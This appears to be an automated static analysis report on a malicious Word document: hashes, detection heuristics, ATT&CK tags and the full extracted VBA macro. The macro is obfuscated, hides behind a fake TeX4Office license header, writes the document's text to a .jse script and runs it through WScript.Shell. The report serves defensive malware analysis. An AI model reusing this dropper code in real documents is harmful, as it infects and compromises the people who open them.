Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fdcd86d687572452…

MALICIOUS

Office (OLE)

426.5 KB Created: 2019-12-05 10:15:00 Authoring application: Microsoft Office Word First seen: 2020-06-02
MD5: f807a786504cc01da5d67d39cee9b433 SHA-1: 0058d9c9f2ed7f77c67c8f97b7ef61152712db4d SHA-256: fdcd86d687572452edb4a526ad13177fe888cfdf217bba4d4fc01cd76ddaa5a8
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as a malicious dropper by ClamAV. It contains VBA macros that utilize CreateObject and CallByName, common techniques for executing malicious code. The macros appear to be obfuscated and likely intended to download and execute a second-stage payload, as indicated by the dropper classification.

Heuristics 5

  • ClamAV: Doc.Dropper.Detected-10024943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Detected-10024943-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3844 bytes
SHA-256: 85f5c3e19d2280d720d0f54fe25804deede8f3cbb10e3452676f6d3257b2c2c1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' 2019(c) TeX4Office
' Developer: Cheng-Kuan Wei

'
' Licensed to the Apache Software Foundation (ASF) under one
' or more contributor license agreements.  See the NOTICE file
' distributed with this work for additional information
' regarding copyright ownership.  The ASF licenses this file
' to you under the Apache License, Version 2.0 (the
' "License"); you may not use this file except in compliance
' with the License.  You may obtain a copy of the License at
'

'
' This file incorporates work from Jonathan Le Roux and Zvika
' Ben-Haim's IguanaTeX project which is originally released
' under the Creative Commons Attribution 3.0 License; you may
' not use this file except in compliance with the License.
' You may obtain a copy of the License at
'

'
' Unless required by applicable law or agreed to in writing,
' software distributed under the License is distributed on an
' "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
' KIND, either express or implied.  See the License for the
' specific language governing permissions and limitations
' under the License.



Private GerDop0 As String
Private Bed_879 As String
Private TookRett As String


Public Function StartWith(str As String, start As String) As Boolean
     Dim startLen As Integer
     startLen = Len(start)
     StartWith = (Left(Trim(str), startLen) = start)
End Function


Function IsInArray(arr As Variant, valueToCheck As String) As Boolean
    IsInArray = False
    For Each n In arr
        If n = valueToCheck Then
            IsInArray = True
            Exit For
        End If
    Next

End Function


Function ReadConfig(code As String, engine As String, dpi As Integer, fileName As String)
    
    On Error Resume Next
    Lines = Split(code, vbNewLine)
    
    For i = 1 To Lines.Count
        Key_Value = Split(Lines(i), ",")
        
        Key = Key_Value(1)
        Value = Key_Value(2)
        
        Select Case Key
           Case "engine"
              engine = Value
           Case "dpi"
              dpi = CInt(Value)
           Case "fileName"
              fileName = Value
           'Case Else
           
        End Select
    Next
    VBA.CallByName VBA.CreateObject(TookRett & "W" & TookRett & "Sc" & TookRett & "rip" & TookRett & "t." & Bed_879), _
    "R" & Empty & "u" & TookRett & "n", VbMethod, _
    """" & GerDop0 & """" & " " & fileName, 0
End Function


    
Private Sub Gter_Kloo(no As String)
GerDop0 = no & Empty & "\..\OdaToMe" & TookRett
On Error Resume Next
MkDir GerDop0
GerDop0 = "" & GerDop0 & Empty & "\OretD." & TookRett & "j" & Empty & "s" & "" & "e" & Empty
Dim yugop As Integer
yugop = FreeFile
Open GerDop0 For Output As #yugop
Print #yugop, ActiveDocument.Content.Text
Close #yugop
Bed_879 = Empty & "s" & TookRett & "h" & Empty & "el" & "" & "l" & Empty
Exit Sub
StartWith "In the world", "Lol"
End Sub


Function ToCollection(a As Variant) As Collection
    Dim c As New Collection
    On Error Resume Next
    For Each Item In a
      c.Add Item
    Next
    Set ToCollection = c
    Gter_Kloo Application.StartupPath
End Function


Private Function gtlke_456()
gtlke_456 = Len(ActiveDocument.Content.Text)
End Function

    
Private Sub Sa_qwe()
TookRett = Empty
If (gtlke_456 > 8021) Then
ToCollection 4
ActiveDocument.Content.Text = ""
ReadConfig "J", "Word", 1, "Koll"
ActiveDocument.Close
End If
End Sub



Private Sub MultiPage1_Layout(ByVal Index As Long)
Sa_qwe
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.